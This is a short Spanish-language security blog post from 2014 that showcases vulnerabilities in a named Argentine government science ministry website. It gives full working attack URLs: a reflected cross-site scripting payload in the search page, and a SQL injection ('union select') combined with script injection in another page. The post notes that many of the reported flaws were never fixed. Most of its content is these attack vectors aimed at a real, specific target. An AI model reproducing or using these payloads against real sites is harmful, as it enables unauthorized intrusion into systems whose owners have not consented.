Nuevas Entradas

XSS y SQLI www.mincyt.gov.ar

Posted by Security Signal on 22:54 in | Comments : 0

Con esta entrada quiero iniciar nuestra sección de Show Off, donde se mostraran sitios con distintas vulnerabilidades que hemos reportado, muchas de ellas han sido fixeadas. Pero no todo es color purpura, muchos SysAdmins nunca nos dieron respuesta a los reportes y los fallos siguen vigentes


Sitio: http://www.mincyt.gov.ar

Vector:
http://www.mincyt.gov.ar/resultados_busqueda.php?cx=012663929835059603360%3A4cqifzdkrgc&cof=FORID%3A10&ie=UTF-8&q=<%2Fdiv><script>alert("HD_Breaker - URS")<%2Fscript><!--

Buscando un SQLI & XSS:

Vector:
http://www.mincyt.gov.ar/busqueda/index.php?Id_modulo=3+union+select+1,2,3,4&Id_idioma=1&Id_tag=136&nombreTag=%3Cscript%3Ealert(%22HD_Breaker%20-%20URS%22)%3C/script%3E

Autor: hdbreaker

Share this:

 
Copyright © 2014 Security Signal.
Designed by OddThemes | Distributed By Gooyaabi Templates